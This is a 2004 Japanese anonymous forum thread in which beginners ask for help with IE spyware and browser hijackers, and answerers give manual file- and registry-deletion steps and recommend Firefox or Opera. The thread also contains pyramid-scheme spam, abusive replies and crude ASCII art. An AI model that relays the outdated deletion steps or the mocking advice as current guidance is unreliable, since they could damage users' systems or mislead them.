 Mozilla Firefox0.9(最新版) http://jt.mozilla.gr.jp/products/firefox/
 ※Mozilla Firefox0.9 日本語版 http://www5e.biglobe.ne.jp/%7Elevel0/mozilla/jp.html#Firefox
 ダウンロードしたFirefoxSetup-0.9-jaJP-2.exeをダブルクリックでインストール
 詳しくはMozilla Firefox 0.9 (One Tree Hill) リリースノート
 http://jt.mozilla.gr.jp/products/firefox/releases/0.9.html

Windows XP で Firefox をデフォルトに設定すると[インターネットの閲覧]の右クリックで
文字化けする→対策:fire-fix.reg をダウンロード→ダブルクリック(レジストリ設定)
http://shiten.s13.xrea.com/fire-fix.reg


65 :ひよこ名無しさん:04/07/06 02:33 ID:???
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

66 :ひよこ名無しさん:04/07/06 02:53 ID:???
>>63 がんばれよOpera厨!
691名無しさん@お腹いっぱい。sage04/07/05 23:06 ID:UUM7647Y
IEの“フレーム詐称問題”はセキュリティ設定で回避可能
http://www.forest.impress.co.jp/article/2004/07/05/framefraud.html

この問題を回避できないのはOperaだけになってしまいますた

692名無しさん@お腹いっぱい。sage04/07/06 02:38 ID:5kfHHJ3o
Opera がかわいそうになってきたよ

693自転車置き場にてsage04/07/06 02:48 ID:I8at58kS
好きです。先輩……

67 :ひよこ名無しさん:04/07/06 03:07 ID:???
>>66
とにかくこれからはIEで怪しいところへ行かないこと。

★重要★IEの部品を利用しないブラウザを利用するとハイジャックや強制ダウンロード
  などほとんどのトラブルが防げます。
 Opera7.5(最新版) http://download.opera.com/
  Opera7.5 日本語ファイル http://my.opera.com/community/customize/langs/
  Operaをインストールしたフォルダへダウンロード→OperaのメニューのTools→
  Preferences→ Languages→ User Interface Languageでchooseボタンを押し、
  ダウンロードしたja_7818.lngを選択→OK
 Firefox http://jt.mozilla.gr.jp/products/firefox/ ←窓左上のWindows-日本語版

68 :ひよこ名無しさん:04/07/06 06:56 ID:???
(´-`).。oO(このスレある意味終わってるなぁ)
(´-`).。oO(10スレくらい前が懐かしいなぁ)

69 :ひよこ名無しさん:04/07/06 07:23 ID:???
タブブラウザーの宣伝が多すぎるよ〜金貰ってる???

70 :ひよこ名無しさん:04/07/06 07:27 ID:???
そうだよな。なんでケータイは紹介しないんだ。

71 :ひよこ名無しさん:04/07/06 12:22 ID:???
(;´Д`)レジストリってのが、どこで弄れるのやらサパ-リ…

72 :ひよこ名無しさん:04/07/06 12:40 ID:???
http://higaitaisaku.web.infoseek.co.jp/regedit.html
レジストリエディタ(regedit)の使い方

73 :ひよこ名無しさん:04/07/06 14:08 ID:???
>>72
こちらのサイトには大分お世話になりました。事情があって再インストールできない私にとって救世主でした。
しかしながら、IEを使っている限りはパラサイトに入り込まれてしまうリスクは無くならないので、
思い切ってFirefoxをメインのブラウザにしてみました。
IEに比べるとシンプルな感じですが、かえって快適な気がします。

74 :ひよこ名無しさん:04/07/06 15:07 ID:PV1gDGfm
なんでopera等のブラウザ使うと予防できるのですか?
あとそれが串ってブラウザの事ですか?

75 :ひよこ名無しさん:04/07/06 15:27 ID:???
>>74
かなりできる
違う

76 :ひよこ名無しさん:04/07/06 16:07 ID:PzMUBnl+
ここのテンプレみてたすかりました。ありがとうございます

77 :ひよこ名無しさん:04/07/06 16:44 ID:???
>>74
串とブラウザは違う。

スパイウェアというものは基本的には商業目的で作られるので、
効果をねらって、シェア90%以上のIEがターゲットにされる。
シェアの小さいIE以外のブラウザには対応していない。
(よーするに、使用者数が少ないので相手にされずに済む)
簡単に言うと、スパイウェアはIEの合鍵を持っているが、
他のブラウザのものは持ってないということ。

勿論そういった非IEブラウザもシェアが増えていけばどうなるかは解かりませんが、
今のところは安心でしょう。
あと、自動ポップアップを遮断する機能がいいですよ。(Firefox)

78 :みすず:04/07/06 18:01 ID:FlOz3AlA
http://members.goo.ne.jp/home/vvvnanakovvv
あのーこれって地道に儲けている人沢山いるってテレビ、知っとく、
で見たのですがパソコンがベテランでないと駄目なのかなー??
他のインチキとは違って、だいぶ努力は始めに必要らしいですが
ねずみ講であろうがインチキであろうが実際収入が入ればいいと
思います、頑張らないと上の人だけ儲かるシステムらしいですが
どうなのかなー?気になってます・


79 :ひよこ名無しさん:04/07/06 18:10 ID:???
>>78
ウィルスです

80 :ひよこ名無しさん:04/07/06 18:15 ID:???
>>78
ネズミです。
すぐ破綻します

81 :ひよこ名無しさん:04/07/06 18:19 ID:???
儲かるのなら、もうとっくに誰でもやってますよ。
それほど広まらないって事は、たいしたメリットがないって事です。

82 :ひよこ名無しさん:04/07/06 18:36 ID:???

415 名前:みすず[] 投稿日:04/07/05(月) 18:02 ID:u113OY+1
http://members.goo.ne.jp/home/vvvnanakovvv
あのーこれって地道に儲けている人沢山いるってテレビ、知っとく、
で見たのですがパソコンがベテランでないと駄目なのかなー??
他のインチキとは違って、だいぶ努力は始めに必要らしいですが
ねずみ講であろうがインチキであろうが実際収入が入ればいいと
思います、頑張らないと上の人だけ儲かるシステムらしいですが
気になってます・・・・

237 名前:みすず[] 投稿日:04/07/05(月) 18:03 ID:u113OY+1
http://members.goo.ne.jp/home/vvvnanakovvv
あのーこれって地道に儲けている人沢山いるってテレビ、知っとく、
で見たのですがパソコンがベテランでないと駄目なのかなー??
他のインチキとは違って、だいぶ努力は始めに必要らしいですが
ねずみ講であろうがインチキであろうが実際収入が入ればいいと
思います、頑張らないと上の人だけ儲かるシステムらしいですが
気になってます・

345 名前:みすず[] 投稿日:04/07/06(火) 17:57 ID:FlOz3AlA
http://members.goo.ne.jp/home/vvvnanakovvv
あのーこれって地道に儲けている人沢山いるってテレビ、知っとく、
で見たのですがパソコンがベテランでないと駄目なのかなー??
他のインチキとは違って、だいぶ努力は始めに必要らしいですが
ねずみ講であろうがインチキであろうが実際収入が入ればいいと
思います、頑張らないと上の人だけ儲かるシステムらしいですが
どうなのかなー?気になってます・

他にも・・・

83 :ひよこ名無しさん:04/07/06 18:40 ID:???
数週間前に踏んでしまったようで
電源オン→インターネット接続→5分くらい絶つと自然に切れる
→再接続→なんかコメント出てるけど無視→30分に1回ウェブサイトビュアー
か何か知らんが外人のネーちゃんの画面が強制的に乱入 デスクトップにも出現
ARE YOU READY と出るけど OKにしかできないししないと先に進まない。
毎日毎日削除しても出てくる 初心者だからワケワカラナイ 助けて下さい。
ウィルス検査しても感染してないって出るしよく分かりません。

84 :ひよこ名無しさん:04/07/06 18:41 ID:???
>>83
sageるな。
質問していいのは、>>1-11を実行してから。

85 :ひよこ名無しさん:04/07/06 18:50 ID:???
エロサイトスレ回答者臨時訓練?

86 :ひよこ名無しさん:04/07/06 19:20 ID:9b4/5A0i
すみません、教えてください。
起動するたびに「強制終了するぞ云々」と表示されます。
ホームの所が消しても消しても起動するたびに「search for...」
とかいうページに設定されてしまうのです。
このアドレスは「about blank」としか表示されません。
そこでテンプレにあったそれらしき対策のやつをダウンロードして実行したのですが
効果がないようです。
(ダウンロードしたのは古いやつです。新しい奴は解答する奴でもうまくダウンロードできませんでした)
そして98だから起動時にCtrlを押し続けて「なんとかオンリー」にしてみても
うまくいきませんでした。
この「search for...」というのは悪性のウィルスでしょうか?
テンプレでは対応していないと思うのですが・・・
くだらい質問でごめんなさい

87 :ひよこ名無しさん:04/07/06 19:21 ID:???
>>86
読み方&努力が足りない。

88 :ひよこ名無しさん:04/07/06 19:22 ID:s9rt94an
JOEって誰だよ。

89 :ひよこ名無しさん:04/07/06 19:33 ID:???
>>86
テンプレで対応してないと言われたのがシャクなので一応。
>>9のテンプレ6。

90 :ひよこ名無しさん:04/07/06 20:26 ID:???
>>86
マルチ氏ね

91 :ひよこ名無しさん:04/07/06 20:56 ID:Xkw0qJtH
テンプレ読んできました。 
WindowsXPなんで、システムの復元をやったらなんどもやっても失敗ばかりでできません。
ad-awareなどもためしてもだめでした。
コンピュータウィルス総合スレッド VOL.38にレスした時ので、案内されてきました

スパイウエアに感染して、ad-awareを使ったんですけど直りません。
デスクトップも変な画像になってしまっています。
プログラムの追加と削除で見てみましたが、なにを削除すればいいのかわかりません
どなたか教えてください。 OSはWindowsXPです。

プログラムの追加と削除
Windows SR2,0
Windows SA
SEP
NVIDIA n FORCE
@BIOS
DiscWizard
NOAdware
WildArcade
ATiControl Panel
ATI Dispay Driver
Direct Show ogg
IE Host
LOgicool itouch ソフトウエア
LOgicool Mouseware 9,79,1
Macromedia shockwave play
MAX speed
WindowsXP service pack 1a
Windows ホト
Broad station ユーサリティ
Internet EXploer Q832894


92 :86:04/07/06 20:59 ID:9b4/5A0i
>>90
マルチじゃない
>>89
すみません、>>9のテンプレで「regedit」の中を捜しても
Appで始まるものや最後がwindowsで終わるやつがないんです。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
↑のキーが無いんです。
最後の所が違っているのはあるんです。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion●●●
となって最後の●●のところは2種類あるんですけど
最後がWindowsで終わるキーが無いのです。

93 :ひよこ名無しさん:04/07/06 21:07 ID:???
>>92
よくみたらテンプレみるに耐えないな。
ここに直接いけ。他の項も全てよんでなんでやられたか調べろ
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

94 :ひよこ名無しさん:04/07/06 21:10 ID:???
テンプレは失敗作なの?

95 :ひよこ名無しさん:04/07/06 21:24 ID:???
HTMLでちゃんと整ってないとちょっと読む気にならない

96 :ひよこ名無しさん:04/07/06 21:24 ID:XWfCX0j6
評価版でウイルス除去することはできますか?

97 :ひよこ名無しさん:04/07/06 21:25 ID:???
むり
おとなしくノートン先生買え

98 :ひよこ名無しさん:04/07/06 21:31 ID:XWfCX0j6
だってこれには無料で除去できるって書いてありますよ?
ttp://www.pandasoftware.com/activescan/jp/activescan_principal.htm

99 :ひよこ名無しさん:04/07/06 21:32 ID:???
じゃ聞くなヴォケ

100 :ひよこ名無しさん:04/07/06 21:37 ID:???
正しいテンプレは>>4-12ですな

101 :ひよこ名無しさん:04/07/06 21:43 ID:XuHd2DSs
すいません >>83です。

NEC VALUE STAR
WINDOWS ME 2000
>>1>>11に目を通しましたが、初心者には??です。
本当にすいません。

102 :ひよこ名無しさん:04/07/06 21:44 ID:???
業者に頼もうYo!

103 :業者:04/07/06 21:46 ID:???
業者ですが何か?

104 :101:04/07/06 21:47 ID:XuHd2DSs
やっぱお金かけたくないですから
まずここに来ました。



105 :ひよこ名無しさん:04/07/06 21:49 ID:???
>>101
>WINDOWS ME 2000

どっちだよ

106 :ひよこ名無しさん:04/07/06 21:50 ID:???
>>101
ざまあみろ

107 :101:04/07/06 21:50 ID:XuHd2DSs
>>105
WINDOWS ME です。 (2000も付くと思ってました)

108 :ひよこ名無しさん:04/07/06 21:51 ID:???
Meは厄介すぎ
はやくXpにすれ

109 :ひよこ名無しさん:04/07/06 21:52 ID:???
>>104
>やっぱお金かけたくないですから

そういう人相手にしたくない

110 :ひよこ名無しさん:04/07/06 21:54 ID:???
>>109
いいカモじゃないか。
折角だから相手してやれ

111 :101:04/07/06 21:54 ID:XuHd2DSs
>>106
ウィルスなんすか?
ウィルスチェックしても
反応なしなんですけど、何故か突然しゃしゃり出てくるんです。
ホントこれ何もんですかね?
画像ボックス(エロ)見た後か、長崎県のネバタの画像見た後
あたりで何か踏んだ臭いんですが、とりわけパソコンが仕えないという弊害はないんだが・・・
何か駆除したいです

112 :ひよこ名無しさん:04/07/06 21:55 ID:???
>>111
ざまあみろ

113 :ひよこ名無しさん:04/07/06 21:56 ID:???
>>111
テンプレが理解できないのなら、
まずシステムの復元をしてみてそれでもだめならリカバリ推奨。

114 :ひよこ名無しさん:04/07/06 21:56 ID:???
>>111
ウイルススキャンはスパイウエアには反応しない。
おまいが同意の上でインストールしたソフトだから。

115 :101:04/07/06 21:57 ID:XuHd2DSs
>>109 >>110
えっ! 無料じゃ相談にのっちゃくれないのですか?
誰か親切な人助けて下さい。

116 :ひよこ名無しさん:04/07/06 21:58 ID:???
>>115
うるせー馬鹿

117 :ひよこ名無しさん:04/07/06 21:58 ID:???
>>115
>>10をやって偉い人に見てもらえ。

118 :ぼるじょあ ◆yBEncckFOU :04/07/06 21:58 ID:???
>>111
(・3・) エェー もう行者しかないYO!

119 :101:04/07/06 21:59 ID:XuHd2DSs
>>113
テンプレを理解できるように、今から頑張ってみます。
それでも分からなかったら、又来ます。
有難うございました。

120 :ひよこ名無しさん:04/07/06 21:59 ID:???
>>115
エロ見杉

121 :ひよこ名無しさん:04/07/06 22:00 ID:???
いやもういいよこなくて

122 :ひよこ名無しさん:04/07/06 22:14 ID:???
>>101
自己解決出来るくらいの力がある程度あるか、多少のPCの不具合の対処法を知っている
ようでなければ無料の物は使わん方が多分良いぞ

123 :ひよこ名無しさん:04/07/06 22:17 ID:???
冷たい叔父ちゃんが多いな。助けてやれよ。


124 :ひよこ名無しさん:04/07/06 22:18 ID:???


   て い う か  
  欠 陥 だ ら け の I E で
   エ ロ サ イ ト 見 て る 
  お ま い ら が わ る い ん だ




125 :ぼるじょあ ◆yBEncckFOU :04/07/06 22:18 ID:???
(・3・) エェー ぼくちょっとしかオジサンじゃないYO!

126 :ぼるじょあ ◆yBEncckFOU :04/07/06 22:19 ID:???
(・3・) エェー 見知らぬ他人の場合は小父ちゃんと書くのが正解だYO

127 :ひよこ名無しさん:04/07/06 22:19 ID:???
>>101
テンプレ読んで理解できないなら、多分説明しても訳ワカンネ、と思うはずだから
必要なデータをバックアップとってPC再インストールが良いと思う。
これは煽りじゃなくて、マジな。

128 :ひよこ名無しさん:04/07/06 22:21 ID:???
それだ!!

129 :122:04/07/06 22:21 ID:???
…よく見たら、無料ってソフトのことじゃなかったか。

130 :ひよこ名無しさん:04/07/06 22:51 ID:91T4Z6LO
すいません・・・
いきなりホームページに
「Detected SPYware! System error #384
Using this address a remote computer has gained
anaccess to your computer and probably is collecting
the infomation about the sites you've visited and the files
contained in the folder Temporary Internet Files」
なんて出ました・・・
これはテンプレの何処で対処できますか?
教えてください。お願いします・・・

131 :ぼるじょあ ◆yBEncckFOU :04/07/06 22:54 ID:???
>>130
(・3・) エェー 最初から順番にやってけYO いきなり正解を求めると人生ろくなことにならないYO

132 :ひよこ名無しさん:04/07/06 22:54 ID:???
>>130
ちゃんと検索しましたか?調べればすぐに分かりますよ、、、
http://dictionary.goo.ne.jp/search.php?MT=%A4%DE%A4%F3%A4%B3&kind=jn&mode=0&base=1&row=1

133 :ひよこ名無しさん:04/07/06 22:55 ID:???
>>130
http://higaitaisaku.web.infoseek.co.jp/removereg32.html

134 :ひよこ名無しさん:04/07/06 22:59 ID:91T4Z6LO
>>131-133
どうもです。やってみます

135 :ひよこ名無しさん:04/07/06 23:00 ID:ObWG6M+D
アドウエアは放っておいても問題無い?

136 :ひよこ名無しさん:04/07/06 23:07 ID:91T4Z6LO
ところで電源落とすとデスクトップが元に戻っちゃうんですが関係ありますか?

137 :ひよこ名無しさん:04/07/06 23:13 ID:???
>>135
物による。
>>136
何が?

138 :ひよこ名無しさん:04/07/06 23:14 ID:91T4Z6LO
>>137
スパイウェア?がです。

139 :ひよこ名無しさん:04/07/06 23:42 ID:???
>>138
スパイウェアって何でつか? 初心者なので丁寧に教えてください。

140 :ひよこ名無しさん:04/07/07 00:00 ID:i95OGkx0
about:blankのsearch for型で困ってます。
>>9の通り実行しようとしているのですが、
>Search for画面の適当な場所を右クリック→「ソースの表示」をクリック→
この操作が出来ません。右クリックしても変化なしです。
そのため表示からソースを選択しました。
するとその中には、<!-- saved from url=res://エンコードされた文字列>部分が見つかりません。(!-- saved from url=res://で始まる文字列が見つからない)
で、似たようなのを探して見ると
<base href="res://%43%3a%5c%57%49%4e%44%4f%57%53%5c%53%79%73%74%65%6d%33%32%5c%6b%66%70%66%69%66%2e%64%6c%6c/">
があったので、これをコピーしてDecode?してみました。
すると<base href="res://C:\WINDOWS\System32\kfpfif.dll/">と出てきました。
このSystem32ってファイルを見つけたんですが、削除すればいいんでしょうか?
削除を試みたのですがウィンドウズのシステム・・と出て削除できません。
どーしたらいいんでしょう??何方かヨロ。

141 :ひよこ名無しさん:04/07/07 00:01 ID:???
>>140
削除すんな馬鹿。

142 :ひよこ名無しさん:04/07/07 00:02 ID:???
>>140
<base href="res://C:\WINDOWS\System32\kfpfif.dll/"> でいい。
safemodeで起動して
system32 フォルダの kfpfif.dll を削除する。
>>9 というか、ただしい手順は↓こっち
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

143 :ひよこ名無しさん:04/07/07 00:03 ID:???
>>140
フォルダとファイルを間違えるなよ。
System32というフォルダの中に入っているkfpfif.dllというファイルが元凶だということだ。
ちゃんと手順通りにやれよ。

144 :ひよこ名無しさん:04/07/07 00:03 ID:???
>>142-143
お前らに回答者は無理。

145 :140:04/07/07 00:04 ID:i95OGkx0
>>141
削除じゃないんですか?
>→Windowsをセーフモードで(F8連打して)起動して見つかったファイルを削除する→(゚д゚)ウマー
これって名称と位置が分かった悪ファイルを削除するって意味じゃないんですかね?



146 :86:04/07/07 00:06 ID:9gXchjfE
>>140
僕も今同じことやってます。
「seach for...」対策を8時間続けてるけど全然前に進まない。
同じく右クリックできないのでツールバーの『表示』ボタンでソースは出たけど
で、全く同じく、目指すファイル?が見つからない。
しかも僕は98使ってるせいか、初心者ツールってのが起動しない
困ったなー
ってか、こういう「seac for...」とかのシステムを開発した人は
ちゃんと逮捕されて豚箱行ってくれるんだろうか
死刑にして欲しいよ

147 :ひよこ名無しさん:04/07/07 00:07 ID:???
>>146
これは日本国では犯罪行為じゃないので逮捕とか全く関係ない。

148 :ぼるじょあ ◆yBEncckFOU :04/07/07 00:07 ID:???
>>145
(・3・) エェー ソース表示した時点でnogdpzcを起動してるので新たな段階に進んでますYO

149 :140:04/07/07 00:16 ID:i95OGkx0
>System32というフォルダの中に入っているkfpfif.dllというファイルが元凶だということだ。
kfpfif.dllというファイルを見つけました!
これをセーフモードで起動→削除 でいいんですよね?なんか怖いな。。
取りあえずやってみます。有難う御座いました。

150 :ひよこ名無しさん:04/07/07 00:17 ID:???
>>149
二度と来んなヴォケ

151 :ひよこ名無しさん:04/07/07 00:20 ID:???
>>149
レジストリも修正する必要有り。
とくに AppInit_DLLs

152 :ひよこ名無しさん:04/07/07 00:27 ID:???
>>151
お前に回答者は無理。

153 :ひよこ名無しさん:04/07/07 00:30 ID:???
>>152
池沼は黙っテロ

154 :ひよこ名無しさん:04/07/07 00:34 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、今夜も賑わってるね♪
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < ゆっくりしてって下さいモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

155 :ひよこ名無しさん:04/07/07 00:38 ID:???
   ∧_ 人
   (;´Д(__)マスター
   ( つ (__)キムタクカット
   ) 「( ・∀・) オナガイ
     |/~~~~~~ヽ


156 :ひよこ名無しさん:04/07/07 00:45 ID:RfZYzZq1
エロサイト見てたら勝手に登録されて5日以内に支払ってください。って表示されました。
こういうときどうすればいいですか?
ちなみに携帯です。

157 :ひよこ名無しさん:04/07/07 01:00 ID:???
>>156
払えよ、見たんだろ。

158 :156:04/07/07 01:02 ID:RfZYzZq1
>>157
見たというか入ったら勝手に登録されたんです。
どうすればいいですか?

159 :ひよこ名無しさん:04/07/07 01:07 ID:???
>>156
好きにしろよ。
ネタは間に合ってるからね。

160 :ひよこ名無しさん:04/07/07 01:08 ID:???
>>156
無視すればいいと思うよ。無効には住所分からないんだし

161 :156:04/07/07 01:13 ID:RfZYzZq1
>>159
ネタじゃないです…本当です…
>>160
それって本当ですか?
心配で心配で…

162 :ひよこ名無しさん:04/07/07 01:17 ID:???
>>161
こういう時はな、男ってもんは覚悟を決めて

     /ー'i iー-'i      /ー─----─t  ;ー-'7 ;ー-'7
     /  / |   |     /____  /  /  / /  /
.    /  /  |  | __ __ _    / ./   /  / /  /
   /  /   |  | L」L」/ / /  \  /  / /  /  _
   /  / . |  |   / / /  ,ヘ  \/  / /  ´ ̄ /
 /,-‐''   ー-、|   //∠_/  \__/_/ /__,;-‐''´
 ''´
 
             /ー'i iー-'i      /ー─----─t  ;ー-'7 ;ー-'7
             /  / |   |     /____  /  /  / /  /
.            /  /  |  | __ __ _    / ./   /  / /  /
           /  /   |  | L」L」/ / /  \  /  / /  /  _
           /  / . |  |   / / /  ,ヘ  \/  / /  ´ ̄ /
         /,-‐''   ー-、|   //∠_/  \__/_/ /__,;-‐''´
         ''´
だ。

163 :ひよこ名無しさん:04/07/07 01:18 ID:???
>>161
エロサイトは見ない。
何か請求来るまで放置。
もし何か請求が来たら消費者相談センターみたいなところに相談。

164 :ひよこ名無しさん:04/07/07 01:29 ID:???
>>156
払ってください
期日までに振り込まれない場合は
当社の代理人の回収業者がお宅にお伺いします

165 :156=158=161:04/07/07 01:29 ID:RfZYzZq1
わかりました!
わかりました!
もしなんかあったら消費者相談センターに相談します!
あ、誤解されてる方がいらっしゃるみたいですが、私は♀です。
ありがとうございました。

166 :ひよこ名無しさん:04/07/07 01:34 ID:???
>>165
何でそのエロサイト見たのか教えてくれ。

167 :ひよこ名無しさん:04/07/07 01:34 ID:???
>>165
欲求不満でうずいてエロサイト行くオンナはまわりにたくさんいるぞ?
どいつもメガネブタだ。まあ、仕方がないさ。

168 :165:04/07/07 01:40 ID:???
             ry、
             / / }
           _/ノ.. /、 ハァハァ
           /  <   }
      ry、     {k_ _/`;,  ノノ パンパン
    / / }      ;'     `i、 
   _/ノ../、   _/ 入/ /   `ヽ, ノノ
  /  <  }''i" ̄.   ̄r'_ノ"'ヽ.i   ) ―☆
 {k_ _/,,.'  ;.  :.      l、  ノ  
    \ `  、  ,i.    .:, :, ' / / \
     ,;ゝr;,;_二∠r;,_ェ=-ー'" r,_,/   ☆

         ↑
こういうふうにされたかったんです。

169 :ひよこ名無しさん:04/07/07 02:53 ID:ndS+Y0vv
Googleで検索すると、Detected SPYware! System error(青い画面)がでてきます。
テンプレ8は試しましたがなおりません。
どのように対処したらよいでしょうか?お願いします。

170 :ひよこ名無しさん:04/07/07 02:59 ID:???
>>169
↓ここ参照
http://higaitaisaku.web.infoseek.co.jp/removereg32.html

171 :ひよこ名無しさん:04/07/07 04:58 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      | マスター、笹と短冊ちょうだい。
       レヽ____________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ´∀) / ̄ヽ  (・∀・ ; ) < ありませんよ!(今日は七夕か…)
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

172 :ひよこ名無しさん:04/07/07 08:22 ID:qYTxTywR
色んなスレで『串使ってるから安心だ』といった書き込みを見ますが、一体串って何ですか?
危ないサイトに対しても何かしらのメリットがあるのでしょうか?

173 :ひよこ名無しさん:04/07/07 08:26 ID:???
>>172
用語は自分で検索
http://e-words.jp/w/E38397E383ADE382AFE382B7.html

個人情報の収集が目的の串もあり、安易に利用すべきではない。


174 :ひよこ名無しさん:04/07/07 10:19 ID:cVVSUXag
セキュリティ初心者板より
誘導されたのでこちらで質問させてもらいます。

どうも何か踏んだらしく、
IEのホームページがC:\WINNT\system32\IEsp.mhtに
固定されてしまいました。
インターネットオプションで直しても直らず
ad-aware、spybot、CWShredderどれでも駆除できませんでした。
C:\WINNT\system32\IEsp.mhtのファイルを削除しても
しばらくするとまた新しく作成されます。
どうすればよいでしょうか?


175 :ひよこ名無しさん:04/07/07 10:24 ID:???
>>174
Me/XPの場合「システムの復元」を試してみる。
[スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
→[システムの復元]

駄目だった場合は、>>8のテンプレ5。

176 :ひよこ名無しさん:04/07/07 10:27 ID:???
>>174
向こうでレスついてたべ

595 名前:名無しさん@お腹いっぱい。 sage 投稿日:04/07/07 10:21
>>592
Me/XPの場合「システムの復元」を試してみるといいかも。
[スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
→[システムの復元]

駄目だった場合の対策は下のURLだと思う。

greatsearch.biz, jksearch.bizの削除 − ShellServiceObjectDelayLoadを悪用
ttp://higaitaisaku.web.infoseek.co.jp/removesearchbiz.html

177 :ひよこ名無しさん:04/07/07 10:36 ID:???
>>174
間違えた。結構やっかいかも。新種かな?
質問専用掲示板より
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/srch.cgi?no=0&word=IEsp.mht&andor=and&logs=all&PAGE=50

下の文はスパイウェア予防駆除スレの27さんの文章のコピペです。

ドイツ語で書いてあったページによると
system32のフォルダの中にsolo180.exe, O, O.batというファイルがあったら削除。
以下のファイル削除

C:\WINNT\system32\IEsp.mht
C:\WINNT\system32\msadocm32.dll
C:\WINNT\system32\sqlpool.dll

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start PAGE
のabout blankの値を削除

以下のレジストリキーを削除

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B519E07-7824-4adc-8890-93D5EABBF285} \InprocServer32?
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B519E07-7824-4adc-8890-93D5EABBF285} \VersionIndependentProgID?
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B519E07-7824-4adc-8890-93D5EABBF285} \ProgID?
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B519E07-7824-4adc-8890-93D5EABBF285}\Programmable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B519E07-7824-4adc-8890-93D5EABBF285}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion?\Explorer\Browser Helper Objects\{0B519E07-7824-4adc-8890-93D5EABBF285}

以下のレジストリの値を削除
HKEY_CLASSES_ROOT\ADODB.Comand\CLSID \ delete\{0B519E07-7824-4adc-8890-93D5EABBF285}

178 :174:04/07/07 11:04 ID:cVVSUXag
>>177
ありがとうございます。
試してみようと思うのですが、
なにぶん初心者なもので
レジストリーの値の削除と
レジストリーキーの削除の違いがわかりません。
どうちがうのでしょうか?

179 :ひよこ名無しさん:04/07/07 11:25 ID:???
>>178
自分で覚えていくしかない。というより本来普通にパソコンを使っている
人は無理に覚える必要のないこと。誰も教えてくれない。
危機に陥った責任は君にあるのだし
そもそもこんな事は慣れてる人でもやりたくないものだ。
ということで再インストールしかないという結論になると思うよ。


180 :174:04/07/07 11:55 ID:cVVSUXag
>>179
甘えてしまって申し訳ないです。
>>177
のリンク先の掲示板通りに
削除することで解決できました。
みなさんありがとうございました。


181 :ひよこ名無しさん:04/07/07 12:37 ID:???
セキュリティに手間とお金を使うのがいやなら、非IEのブラウザを使いなさい。

182 :ひよこ名無しさん:04/07/07 12:38 ID:???
Firefoxにしなさい。

183 :ひよこ名無しさん:04/07/07 12:48 ID:???
エロサイト行く人にはFirefoxがおすすめ、ていうかIEは危なくて使えないw

184 :ひよこ名無しさん:04/07/07 13:21 ID:jG3/26z8
Detected SPYware! System error #384
Your IP address is 000.000.000.00
Using this address a remote computer has gained anaccess to your computer and probably is collecting the information about the sites you've visited and the files contained in the folder Temporary Internet Files.
Attention! Ask for help or install the software for deleting secret information about the sites you visited.

IEを開いたら、この文とパソコンの環境とかが出て来てよくフリーズしたりする。
どうしたら良いでしょう?
当方IE6.0 OS WIN98


185 :ひよこ名無しさん:04/07/07 13:26 ID:???
>>184
http://www.google.co.jp/search?q=Detected+SPYware%21+System+error+%23384

186 :ひよこ名無しさん:04/07/07 14:12 ID:???
>>184
その文句は、このスレで既出

187 :ひよこ名無しさん:04/07/07 14:20 ID:???
エロサイトに行かなくても、IE使ってる限りはスパイに入り込まれるリスクは無くならないよ。

188 :ひよこ名無しさん:04/07/07 14:26 ID:???
>>184
万が一おかしなものを踏んでやられてしまったら
慌てず騒がずまず電話回線をパソコンから抜くこと。
これをやらないと、勝手に地球の裏側に国際電話をかけられてしまう。
次に感染した日付と時間を間違いなくメモすること。
悪質なファイルを手動で取り除くとき、作成日時が決め手になるからだ。
次にad-aware、Spybotなどで大きい所を削除、
このとき検出されたスパイウェアの名前は確実にメモしておく。
次にマイコンピュータからダイヤルアップネットワークを開けて
設定した覚えのない新しいダイヤルアップができていたらこれを削除する。
続いてマイコンピュータ→Cドライヴ→Windowsフォルダ→Systemフォルダを開けて
ここにあるフォルダ、ファイルを右クリックのアイコンの整列で日付順に並べ変える。
新しいものは左上に行くはずだから、左上のフォルダにまず注目する。
「sr64」とか「access2」とかの、わけのわからないフォルダができていないだろうか?
変なものを見つけたら作成日時を確認し、
感染日時と同じかそれ以降だったら手動でこれを削除する。
フォルダ同様、ファイルも同じようにして調べ、新しくて怪しいものを手動で取り除く。
次に、Systemフォルダと同じことをWindowsフォルダでも行う。
これが一通り終わったら、IEのツール→インターネットオプションから
